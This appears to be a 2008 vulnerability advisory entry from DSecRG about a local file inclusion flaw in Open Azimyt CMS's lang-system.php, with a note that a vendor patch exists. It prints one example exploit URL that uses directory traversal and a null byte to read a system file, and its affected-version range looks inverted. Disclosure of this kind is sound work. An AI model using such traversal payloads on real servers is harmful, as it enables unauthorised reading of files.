vendor:
Open Azimyt CMS
by:
Digital Security Research Group [DSecRG]
4.3
CVSS
MEDIUM
Local File Include
98
CWE
Product Name: Open Azimyt CMS
Affected Version From: 0.22 minimal
Affected Version To: 0.21 stable
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
DSECRG-08-026
Local File Include vulnerability found in script azimyt/lang/lang-system.php. An example exploit is http://[server]/[installdir]/azimyt/lang/lang-system.php?lang=../../../../../../../../../../../../../boot.ini%00
Mitigation:
Vendor fixed this flaw on 10.06.2008. Patch can be downloaded here: http://open-azimyt-cms.googlecode.com/files/security_patch.zip